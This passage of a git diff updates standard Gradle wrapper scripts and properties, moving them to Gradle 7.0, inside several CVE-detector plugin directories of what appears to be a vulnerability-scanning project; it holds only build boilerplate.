+MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/gitlab_cve_2021_22205/gradlew.bat b/community/detectors/gitlab_cve_2021_22205/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/gitlab_cve_2021_22205/gradlew.bat +++ b/community/detectors/gitlab_cve_2021_22205/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/gradio_cve_2023_51449/gradle/wrapper/gradle-wrapper.jar b/community/detectors/gradio_cve_2023_51449/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..d64cd4917 Binary files /dev/null and b/community/detectors/gradio_cve_2023_51449/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/gradio_cve_2023_51449/gradle/wrapper/gradle-wrapper.properties b/community/detectors/gradio_cve_2023_51449/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/gradio_cve_2023_51449/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/gradio_cve_2023_51449/gradlew b/community/detectors/gradio_cve_2023_51449/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/community/detectors/gradio_cve_2023_51449/gradlew @@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. +if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. + +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/gradio_cve_2023_51449/gradlew.bat b/community/detectors/gradio_cve_2023_51449/gradlew.bat new file mode 100644 index 000000000..93e3f59f1 --- /dev/null +++ b/community/detectors/gradio_cve_2023_51449/gradlew.bat @@ -0,0 +1,92 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% +echo. +echo Please set the JAVA_HOME variable in your environment to match the +echo location of your Java installation. + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.jar b/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.properties b/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/influxdb_cve_2019_20933/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/influxdb_cve_2019_20933/gradlew b/community/detectors/influxdb_cve_2019_20933/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/influxdb_cve_2019_20933/gradlew +++ b/community/detectors/influxdb_cve_2019_20933/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - 